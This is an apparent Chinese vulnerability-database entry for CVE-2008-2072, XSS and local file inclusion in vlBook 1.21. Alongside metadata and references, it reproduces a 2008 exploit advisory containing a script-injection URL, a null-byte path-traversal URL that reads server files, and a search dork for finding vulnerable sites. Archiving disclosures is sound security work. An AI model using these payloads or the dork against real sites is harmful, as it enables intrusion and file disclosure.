Virtual Design Studio vlbook 'index.php'跨站脚本攻击和本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115125 漏洞类型 跨站脚本
发布时间 2008-05-01 更新时间 2009-01-29
CVE编号 CVE-2008-2072 CNNVD-ID CNNVD-200805-025
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5529
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-025
|漏洞详情
VirtualDesignStudiovlbook1.21的index.php中存在跨站脚本攻击漏洞,远程攻击者可以通过l参数来注入任意web脚本或HTML。
|漏洞EXP
#####################################################################################
####                    vlBook 1.21 (ALL VERSION)                                ####
####             Multiple Remote Vulnerabilities (LFI/XSS)                       ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#####################################################################################
#                                                                                   #
#Script Download : http://home.vlab.info/vlbook_1.21.zip                            #
#                                                                                   #
#DORK : "Powered by  vlBook 1.21"                                                   #
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://example/?l=" <script>alert('xss')</script>                    #
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00      #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
################################ TNX GOD ############################################

# milw0rm.com [2008-05-01]
|参考资料

来源:XF
名称:vlbook-l-xss(42126)
链接:http://xforce.iss.net/xforce/xfdb/42126
来源:BID
名称:29006
链接:http://www.securityfocus.com/bid/29006
来源:BUGTRAQ
名称:20080501vlBook1.21(ALLVERSION)
链接:http://www.securityfocus.com/archive/1/archive/1/491519/100/0/threaded
来源:MILW0RM
名称:5529
链接:http://www.milw0rm.com/exploits/5529
来源:SREASON
名称:3854
链接:http://securityreason.com/securityalert/3854
来源:SECUNIA
名称:30046
链接:http://secunia.com/advisories/30046